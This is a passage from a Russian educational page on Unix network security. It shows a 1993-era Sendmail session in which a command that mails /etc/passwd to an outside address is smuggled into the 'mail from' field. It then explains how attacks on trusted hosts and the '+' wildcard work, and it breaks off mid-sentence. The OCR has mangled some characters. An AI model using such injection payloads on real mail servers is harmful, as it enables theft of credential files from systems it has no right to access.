Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Escape character is ' `]'.
220 victim.corn Sendmail 5.55 ready at Saturday, 6 Nov 93 18:04
mail from: "I/bin/mail [email protected] " /etc/passwd"
250 "I/bin/mail [email protected] " /etc/passwd"... Sender ok
rcpt to: nosuchuser
Nosuchuser... User unknown
Data
354 Enter mail, end with ". " on a line by itself
.
Mail accepted quit
Connection closed by foreign host.
evil %
Из примера видно, что все атаки на sendmail идут на уровне
Незарегистрированного удаленного пользователя и поэтому относятся к
Сценарию 1.
Атаки на доверие
Напомним, что типичным (и самым опасным) механизмом, использующим доверие,
Является механизм доверенных хостов, при подключении с которых с помощью
Г-служб можно зарегистрироваться под любым именем, кроме root, без
Указания пароля. Само по себе это уже плохо, так как, вскрыв один из
Хостов, кракер сможет легко по цепочке добраться до следующих. Гораздо
более опасно другое: если система, которую собираются атаковать, содержит
шаблон "+" (в некоторых системах он устанавливается по умолчанию) в
Файлах, где описываются доверенные хосты, то все хосты становятся
Доверенными для данного.
Другие описываемые здесь атаки на доверие также основаны на ненадежной
Аутентификации или ее отсутствии, поэтому все они относятся к типовому
Дата публикования: 2014-11-04; Прочитано: 284 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!